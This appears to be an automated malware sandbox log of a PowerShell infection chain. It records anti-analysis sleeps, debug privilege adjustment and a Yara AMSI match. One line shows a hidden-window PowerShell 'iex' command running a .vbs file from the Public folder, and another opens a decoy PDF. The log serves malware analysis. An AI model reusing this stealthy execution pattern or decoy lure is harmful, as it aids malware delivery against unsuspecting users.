      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4771
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5036
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5248
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4514
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696 Thread sleep count: 5248 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep count: 4514 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716 Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 1644 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000000.00000002.2316431496.00000293F778D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000007.00000002.3274442758.0000028B56854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272709392.0000028B5102B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A82F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2082588505.000001A0A9C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: amsi64_2696.amsi.csv, type: OTHER
      Source: Yara match File source: Process Memory Space: powershell.exe PID: 2696, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\j5mh76.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
